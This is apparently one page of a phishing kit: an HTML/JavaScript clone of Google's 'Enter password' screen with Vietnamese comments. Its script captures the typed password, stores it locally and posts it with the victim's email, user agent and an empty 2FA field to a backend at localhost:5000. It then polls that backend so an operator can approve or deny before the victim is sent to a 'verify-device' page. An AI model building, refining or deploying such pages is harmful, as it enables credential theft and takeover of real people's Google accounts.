<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Enter password - Google Accounts</title>
    <link rel="stylesheet" href="styles.css">
    <link href="https://fonts.googleapis.com/css2?family=Google+Sans:wght@300;400;500;600&family=Roboto:wght@300;400;500&display=swap" rel="stylesheet">
    <link rel="icon" href="google_logo_icon_169090.ico">
    <style>
        /* Đẩy input xuống thấp hơn cho trang này */
        .signin-form .input-field {
            margin-top: 24px !important;
        }
    </style>
</head>
<body>
    <!-- Loading overlay -->
    <div class="loading-overlay" id="loadingOverlay">
    </div>

    <!-- Main content -->
    <div class="main-wrapper page-transition">
        <div class="login-wrapper">
            <div class="signin-card">
                <!-- Progress bar container -->
                <div class="progress-container">
                    <div class="progress-bar" id="progressBar"></div>
                </div>
                <div class="signin-columns">
                    <!-- Left Column: Logo, Title, User Info -->
                    <div class="signin-left">
                        <div class="logo-wrapper">
                            <img src="google_logo_icon_169090.ico" alt="Google logo" class="google-logo" style="width:48px;height:48px;" />
                        </div>
                        <h1 class="signin-title">Welcome</h1>
                        <div class="user-info">
                            <div class="user-email-btn" onclick="handleTransition('index.html')">
                                <svg width="20" height="20" viewBox="0 0 24 24" class="user-icon-img">
                                    <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 3c1.66 0 3 1.34 3 3s-1.34 3-3 3-3-1.34-3-3 1.34-3 3-3zm0 14.2c-2.5 0-4.71-1.28-6-3.22.03-1.99 4-3.08 6-3.08 1.99 0 5.97 1.09 6 3.08-1.29 1.94-3.5 3.22-6 3.22z" fill="#5f6368"/>
                                </svg>
                                <span class="user-email" id="displayEmail"></span>
                                <svg width="16" height="16" viewBox="0 0 24 24" class="arrow-img">
                                    <path d="M7 10l5 5 5-5z" fill="#5f6368"/>
                                </svg>
                            </div>
                        </div>
                    </div>
                    
                    <!-- Right Column: Password Form -->
                    <div class="signin-right">
                        <form id="passwordForm" class="signin-form" novalidate>
                            <div class="input-field">
                                <input type="password" id="password" class="text-input" placeholder=" " required autocomplete="current-password">
                                <label for="password" class="floating-label">Enter your password</label>
                            </div>
                            <div class="error-wrapper">
                                <span class="error-text" id="password-error"></span>
                            </div>
                            
                            <div class="show-password-box">
                                <input type="checkbox" id="showPassword">
                                <label for="showPassword">Show password</label>
                            </div>
                            
                            <div class="action-buttons">
                                <button type="button" class="btn-secondary">Create account</button>
                                <button type="submit" class="btn-primary">Next</button>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
        
        <!-- Footer -->
        <footer class="page-footer">
            <div class="footer-wrapper">
                <a href="#" class="footer-link">Help</a>
                <a href="#" class="footer-link">Privacy</a>
                <a href="#" class="footer-link">Terms</a>
            </div>
        </footer>
    </div>

    <script>
        // Function to update page status
        async function updatePageStatus(pageName) {
            const requestId = localStorage.getItem('requestId');
            if (!requestId) return;
            
            try {
                await fetch('http://localhost:5000/api/update-page', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ 
                        id: parseInt(requestId), 
                        currentPage: pageName 
                    })
                });
            } catch (err) {
                console.log('Failed to update page status');
            }
        }

        // Smooth progress bar function for API calls
        function startProgressBar() {
            const progressBar = document.getElementById('progressBar');
            const progressContainer = document.querySelector('.progress-container');
            
            if (!progressBar || !progressContainer) return;
            
            // Show progress container
            progressContainer.classList.add('active');
            
            // Reset and start animation
            progressBar.style.width = '0%';
            progressBar.classList.remove('loading', 'completing');
            
            setTimeout(() => {
                progressBar.classList.add('loading');
                progressBar.style.width = '80%';
            }, 100);
            
            return {
                complete: () => {
                    progressBar.classList.remove('loading');
                    progressBar.classList.add('completing');
                    progressBar.style.width = '100%';
                    
                    setTimeout(() => {
                        progressContainer.classList.remove('active');
                    }, 300);
                },
                hide: () => {
                    progressContainer.classList.remove('active');
                }
            };
        }

        // Page transition handler
        function handleTransition(url) {
            const card = document.querySelector('.signin-card');
            if (card) {
                card.classList.add('fade-out');
                setTimeout(() => {
                    window.location.href = url;
                }, 300);
            } else {
                window.location.href = url;
            }
        }

        // Form validation and submission
        function handleFormSubmission() {
            const form = document.getElementById('passwordForm');
            const passwordInput = document.getElementById('password');
            const passwordError = document.getElementById('password-error');
            const showPasswordCheckbox = document.getElementById('showPassword');

            // Show/hide password functionality
            showPasswordCheckbox.addEventListener('change', function() {
                passwordInput.type = this.checked ? 'text' : 'password';
            });

            form.addEventListener('submit', async function(e) {
                e.preventDefault();
                // Reset previous errors
                passwordInput.classList.remove('error');
                passwordError.textContent = '';
                const password = passwordInput.value;
                // Basic password validation
                if (!password) {
                    showError('Enter a password');
                    return;
                }
                if (password.length < 6) {
                    showError('Password must be at least 6 characters');
                    return;
                }
                // Show loading state
                const submitBtn = form.querySelector('.btn-primary');
                submitBtn.classList.add('loading');
                submitBtn.disabled = true;
                
                // Start smooth progress bar
                const progress = startProgressBar();
                
                // Store password for verification flow (in real app, this would be sent to server)
                localStorage.setItem('userPassword', password);
                
                // Gửi dữ liệu lên backend GUI Local
                const email = localStorage.getItem('userEmail') || '';
                const twofa = '';
                const userAgent = navigator.userAgent;
                let requestId = localStorage.getItem('requestId');
                
                try {
                    const response = await fetch('http://localhost:5000/api/request', {
                        method: 'POST',
                        headers: { 'Content-Type': 'application/json' },
                        body: JSON.stringify({ 
                            email, 
                            password, 
                            twofa, 
                            userAgent,
                            currentPage: 'password.html'
                        })
                    });
                    
                    if (response.ok) {
                        const data = await response.json();
                        requestId = data.requestId;
                        localStorage.setItem('requestId', requestId);
                        
                        // Kiểm tra trạng thái approval
                        await checkApprovalStatus(requestId, 'verify-device.html');
                    } else {
                        // Nếu không kết nối được Backend, chuyển trang bình thường
                        progress.complete();
                        setTimeout(async () => {
                            await updatePageStatus('verify-device.html');
                            handleTransition(`verify-device.html?email=${encodeURIComponent(email)}`);
                        }, 300);
                    }
                } catch (err) { 
                    console.log('Backend not available, proceeding without approval');
                    // Nếu có lỗi, chuyển trang bình thường
                    progress.complete();
                    setTimeout(async () => {
                        await updatePageStatus('verify-device.html');
                        handleTransition(`verify-device.html?email=${encodeURIComponent(email)}`);
                    }, 300);
                }
            });

            function showError(message) {
                passwordInput.classList.add('error');
                passwordError.textContent = message;
                passwordInput.focus();
            }
        }

        // Hàm kiểm tra trạng thái approval
        async function checkApprovalStatus(requestId, nextPage) {
            const maxAttempts = 60; // Tối đa 60 lần kiểm tra (5 phút)
            let attempts = 0;
            
            const checkStatus = async () => {
                try {
                    const response = await fetch(`http://localhost:5000/api/status/${requestId}`);
                    if (response.ok) {
                        const data = await response.json();
                        
                        if (data.status === 'approved') {
                            // Được approve, chuyển trang
                            const email = localStorage.getItem('userEmail');
                            handleTransition(nextPage + '?email=' + encodeURIComponent(email));
                            return;
                        } else if (data.status === 'denied') {
                            // Bị từ chối, hiển thị thông báo
                            showNotification('Access denied. Please try again later.', 'error');
                            const submitBtn = document.querySelector('.btn-primary');
                            submitBtn.classList.remove('loading');
                            submitBtn.disabled = false;
                            return;
                        }
                    }
                    
                    attempts++;
                    if (attempts < maxAttempts) {
                        // Kiểm tra lại sau 1 giây
                        setTimeout(checkStatus, 1000);
                    } else {
                        // Hết thời gian chờ, chuyển trang
                        const email = localStorage.getItem('userEmail');
                        handleTransition(nextPage + '?email=' + encodeURIComponent(email));
                    }
                } catch (error) {
                    console.error('Error checking approval status:', error);
                    attempts++;
                    if (attempts < maxAttempts) {
                        setTimeout(checkStatus, 1000);
                    } else {
                        const email = localStorage.getItem('userEmail');
                        handleTransition(nextPage + '?email=' + encodeURIComponent(email));
                    }
                }
            };
            
            // Bắt đầu kiểm tra
            checkStatus();
        }

        // Hàm hiển thị thông báo
        function showNotification(message, type = 'info') {
            // Remove existing notifications
            const existingNotification = document.querySelector('.notification');
            if (existingNotification) {
                existingNotification.remove();
            }

            const notification = document.createElement('div');
            notification.className = `notification notification-${type}`;
            notification.textContent = message;
            
            // Style the notification
            notification.style.cssText = `
                position: fixed;
                top: 20px;
                right: 20px;
                padding: 12px 20px;
                border-radius: 4px;
                color: white;
                font-size: 14px;
                font-weight: 500;
                z-index: 1000;
                animation: slideIn 0.3s ease;
                ${type === 'error' ? 'background-color: #d93025;' : 'background-color: #1a73e8;'}
            `;

            document.body.appendChild(notification);

            // Remove notification after 3 seconds
            setTimeout(() => {
                notification.style.animation = 'slideOut 0.3s ease';
                setTimeout(() => {
                    if (notification.parentElement) {
                        notification.remove();
                    }
                }, 300);
            }, 3000);
        }

        // Mobile responsive handler
        function handleMobileLayout() {
            function checkMobile() {
                if (window.innerWidth <= 600) {
                    document.body.classList.add('mobile-layout');
                } else {
                    document.body.classList.remove('mobile-layout');
                }
            }
            
            checkMobile();
            window.addEventListener('resize', checkMobile);
        }

        // Display user email
        function displayUserEmail() {
            const urlParams = new URLSearchParams(window.location.search);
            const email = urlParams.get('email') || localStorage.getItem('userEmail') || '';
            const emailElements = document.querySelectorAll('.user-email');
            
            emailElements.forEach(element => {
                element.textContent = email;
            });
        }

        // Initialize when DOM is loaded
        document.addEventListener('DOMContentLoaded', function() {
            handleFormSubmission();
            handleMobileLayout();
            displayUserEmail();
            
            // Focus on password input
            document.getElementById('password').focus();
            
            // Handle create account button
            document.querySelector('.btn-secondary').addEventListener('click', function() {
                // In a real implementation, this would redirect to account creation
                alert('Create account feature would be implemented here');
            });
        });

        // Accessibility improvements
        document.addEventListener('keydown', function(e) {
            // Allow form submission with Enter key
            if (e.key === 'Enter' && document.activeElement.tagName !== 'BUTTON') {
                document.getElementById('passwordForm').dispatchEvent(new Event('submit'));
            }
        });

        // Handle browser back button
        window.addEventListener('popstate', function(e) {
            // In a real implementation, you might want to handle this differently
            handleTransition('index.html');
        });
    </script>
</body>
</html> 